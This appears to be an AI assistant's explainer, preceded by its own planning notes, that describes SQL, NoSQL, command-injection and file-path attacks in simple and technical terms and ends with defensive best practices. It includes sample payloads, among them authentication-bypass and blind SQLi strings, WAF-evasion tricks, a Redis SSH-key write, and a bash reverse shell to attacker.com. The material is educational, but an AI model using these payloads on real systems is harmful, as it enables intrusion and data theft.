Bypass WAF is about evading Web Application Firewalls. Simple analogy: tricking
security systems by disguising malicious input. Advanced techniques might include
encoding payloads, using whitespace, or comments to bypass filters.

Moving to NoSQL: CouchDB, MongoDB, Redis. These are non-relational databases, so


injection here is different. Layman's terms might involve sending malformed JSON or
commands. Advanced could discuss how NoSQL queries can be manipulated, like using
$ne in MongoDB or Lua scripts in Redis.

Command Injection for Windows and Linux. This is about executing OS commands
through an app. Layman: making the server run unintended commands. Advanced would
cover shell metacharacters like ;, &, ||, and how OS differences affect payloads.

File Vulnerability cases. This might involve path traversal or insecure file
uploads. Layman: accessing files they shouldn't by manipulating file paths.
Advanced: using ../ sequences, null bytes, or exploiting file permissions.

Epilogue section. Probably a summary or best practices. Need to mention input


validation, prepared statements, least privilege principles.

Wait, the user also included quizzes and exercises. Should I mention those?
Probably not, since the focus is on explaining the terms, not the practice setup.
But maybe note that quizzes test understanding of DML, features, etc.

I need to structure each section with Layman and Advanced subsections. Make sure to
cover all listed topics: SQL Injection parts, NoSQL, Command Injection, File Vulns,
and the Epilogue.

For each ExploitTech like Error & Time based SQLi, ensure to explain how errors or
response times leak data. Maybe give an example in advanced terms, like using
SLEEP() in MySQL for time-based attacks.

Bypass WAF Advanced might involve more sophisticated techniques like parameter
pollution, splitting payloads across parameters, or using HTTP parameter smuggling.

DBMS Misconfiguration could involve default accounts, unused features enabled, or


excessive privileges. Layman: using poor database settings to gain access.
Advanced: exploiting things like xp_cmdshell in MSSQL if enabled.

For File Vulns in Windows vs Linux, differences in path handling (case sensitivity,
backslashes vs forward slashes), and specific vulnerabilities like .htaccess
misconfigurations in Apache.

Command Injection cases: examples like passing ; cat /etc/passwd in Linux or & dir
in Windows. Advanced: chaining commands, redirecting output, or leveraging
environment variables.

In the Epilogue, emphasize secure coding practices, regular audits, and using
security tools like WAFs, but also their limitations.

Need to check if all listed items are covered: System Table Fingerprinting, DBMS
Fingerprinting, WAF bypass methods, specific DBMS like CouchDB, MongoDB, Redis.

For Redis, maybe mention unauthorized access due to no authentication by default,


and using commands like FLUSHDB or saving SSH keys.

CouchDB might involve HTTP API exploits, creating or deleting databases, or


accessing configuration files.

MongoDB injection could involve operators like $where, or JSON-based queries that
allow JS execution.

Apache .htaccess files control directory settings, so vulnerabilities might include


overriding security settings or allowing execution of scripts.

Alright, I think that covers all the topics. Now structure each section clearly,
use bold for terms, and ensure both simple and technical explanations are provided
without markdown. Keep paragraphs concise, maybe bullet points under each section.

Here's a detailed breakdown of the server-side security topics in layman's terms


(simple explanations) and advanced terms (technical insights):
SQL Injection (SQLi)
SQL DML (Data Manipulation Language)

Layman:
Commands like SELECT, INSERT, UPDATE, and DELETE used to interact with
databases. Attackers exploit these to steal or modify data.

Advanced:
SQL DML forms the basis of database queries. Poorly sanitized inputs in these
commands allow attackers to inject malicious code (e.g., ' OR 1=1 -- to bypass
authentication).

Blind SQL Injection

Layman:
Guessing database content by observing indirect clues, like delays ("If the
page loads slowly, the guess is correct").

Advanced:

Boolean-Based: Infer data from true/false responses (e.g., AND


SUBSTRING(password,1,1)='a').

Time-Based: Use delays (e.g., SLEEP(5)) to confirm guesses.

Tools: sqlmap automates payload generation and exfiltration.

Error & Time-Based SQLi

Layman:
Crashing the database or timing responses to extract information (e.g., "If an
error shows the database type, adjust the attack").

Advanced:

Error-Based: Trigger database errors to leak schema details (e.g., 1/0 in


MSSQL).

Time-Based: Conditional delays (e.g., IF(1=1, SLEEP(5), 0) in MySQL).


System Table Fingerprinting

Layman:
Mapping the database’s structure (e.g., table names, columns) to plan attacks.

Advanced:
Query metadata tables (e.g., information_schema in MySQL, sys.tables in MSSQL)
to extract schema details.

DBMS Fingerprinting

Layman:
Detecting the database type (e.g., MySQL, PostgreSQL) to tailor attacks.

Advanced:

Use version functions (e.g., @@version for MSSQL, version() for MySQL).

Exploit DBMS-specific syntax (e.g., LIMIT vs. TOP).

Bypass WAF (Web Application Firewall)

Layman:
Sneaking malicious code past security filters by disguising it.

Advanced:

Obfuscation: URL encoding, whitespace insertion (e.g., SEL%ECT).

Alternative Syntax: Use /**/ for comments, || instead of OR.

Case Manipulation: SeLeCT to evade case-sensitive filters.

DBMS Misconfiguration

Layman:
Exploiting poorly configured databases (e.g., default passwords, unused
features).

Advanced:

Enable dangerous functions (e.g., xp_cmdshell in MSSQL for OS command


execution).

Abuse excessive privileges (e.g., writing files via INTO OUTFILE in MySQL).

NoSQL Injection
CouchDB

Layman:
Exploiting HTTP API endpoints to access unauthorized data.

Advanced:

Send crafted HTTP requests (e.g., GET /_users to list user accounts).

Use _config endpoints to modify server settings.


MongoDB

Layman:
Tricking NoSQL queries to bypass authentication or dump data.

Advanced:

Inject operators like $ne (not equal) in JSON queries: {"user": "admin",
"password": {"$ne": ""}}.

Exploit JavaScript execution in $where clauses.

Redis

Layman:
Abusing an in-memory database to execute commands or write files.

Advanced:

Use FLUSHDB to wipe data or CONFIG SET to modify settings.

Write SSH keys via SET and SAVE (e.g., SET key "\n\nssh-rsa AAA...).

Command Injection
Windows

Layman:
Forcing the server to run OS commands (e.g., & dir C:\).

Advanced:

Chain commands with &, &&, |.

Use environment variables (e.g., %COMSPEC%).

Linux

Layman:
Exploiting input fields to run terminal commands (e.g., ; cat /etc/passwd).

Advanced:

Use metacharacters like ;, &&, |, $().

Reverse shells (e.g., bash -c 'bash -i >& /dev/tcp/attacker.com/1337


0>&1').

File Vulnerabilities
Windows

Layman:
Accessing restricted files by manipulating paths (e.g., ..\..\secret.txt).

Advanced:

Path traversal with ..\ and UNC paths (e.g., \\attacker.com\share).

Exploit file uploads to drop web shells (e.g., .asp files with malicious
code).
Linux

Layman:
Reading sensitive files (e.g., /etc/passwd) via insecure input handling.

Advanced:

Use NULL bytes (%00) to bypass extensions (e.g., image.php%00.jpg).

.htaccess Misconfiguration: Override server rules to execute scripts.

Epilogue (Best Practices)

Layman:
Always validate user input, limit database permissions, and update software.

Advanced:

Prevention:

Use parameterized queries (SQLi), input validation (Command Injection),


and least-privilege principles.

Disable dangerous functions (e.g., eval() in NoSQL).

Monitoring:

Log and audit database queries and file access.

Deploy WAFs with behavioral analysis to detect obfuscated attacks.

Key Takeaways

SQL Injection: Exploit unsanitized inputs in database queries.

NoSQL: Abuse JSON/HTTP APIs to bypass authentication or execute code.

Command/File Injection: Leverage OS commands or file system access through


insecure input handling.

Defense: Input validation, secure configurations, and principle of least


privilege.

Let me know if you need examples or deeper dives into specific attacks!

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy